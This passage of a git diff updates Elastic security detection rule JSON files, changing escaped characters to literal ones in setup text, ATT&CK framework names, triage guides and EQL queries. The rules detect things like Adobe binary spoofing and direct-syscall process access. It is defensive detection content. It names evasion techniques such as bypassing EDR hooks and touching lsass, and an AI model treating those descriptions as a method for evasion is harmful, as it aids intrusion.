Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_104.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_104.json index 3599082ed68..1b3cb8b388f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_104.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_105.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_105.json index 777c6e29d34..679099fd041 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_105.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_106.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_106.json index c4a62e22aa3..bf25b07fc02 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_106.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_107.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_107.json index 42f1fd110a8..c6242687e2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_107.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_104.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_104.json index 2d50a5612bc..a7262c22982 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_104.json @@ -69,7 +69,7 @@ ], "risk_score": 73, "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_105.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_105.json index d2591de1d34..5c0228638b5 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_105.json @@ -69,7 +69,7 @@ ], "risk_score": 73, "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_106.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_106.json index a6db69d80c1..5b08134ab63 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_106.json @@ -69,7 +69,7 @@ ], "risk_score": 73, "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_107.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_107.json index 0ea656860d1..fe4021f5602 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_107.json @@ -68,7 +68,7 @@ ], "risk_score": 73, "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_103.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_103.json index f801ee1e16a..9da52d74f3e 100644 --- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_104.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_104.json index 0efd5cb8808..12c9f4394e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_104.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_204.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_204.json index b8a1e84ff77..d9ccedbe321 100644 --- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_204.json +++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_204.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_205.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_205.json index d48589dfb5b..e8a0c638399 100644 --- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_205.json +++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_205.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_206.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_206.json index 8f6d5bbea5a..01a06ddf088 100644 --- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_206.json +++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_206.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_207.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_207.json index d6490410029..eb41549b13e 100644 --- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_207.json +++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_207.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_104.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_104.json index e3a6bcf9c31..7b0b8dbbaf9 100644 --- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_104.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git 